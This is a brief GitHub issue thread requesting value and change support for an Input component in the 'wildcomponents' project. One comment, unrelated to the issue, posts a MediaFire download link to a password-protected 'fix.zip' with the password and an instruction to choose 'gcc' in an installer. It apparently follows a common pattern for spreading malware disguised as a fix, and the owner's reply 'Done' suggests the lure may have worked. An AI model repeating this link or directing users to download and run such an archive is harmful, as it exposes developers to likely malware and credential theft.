### ISSUE TITLE
Add value and change to Input component

### ISSUE THREAD

**Issue by titito2005** [titito2005/wildcomponents#32]
## Issue Summary

Add value and change to Input component

## Type of Change

Select the type of change that best describes this issue:

- [x] **feat**: A new feature or functionality
- [ ] **fix**: A bug fix
- [ ] **refactor**: Code improvement without changing functionality
- [ ] **style**: Changes that do not affect code logic (whitespace, formatting, etc.)
- [ ] **docs**: Documentation changes
- [ ] **test**: Adding or correcting tests
- [ ] **chore**: Maintenance tasks or configurations

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by titito2005** [comment]
Done
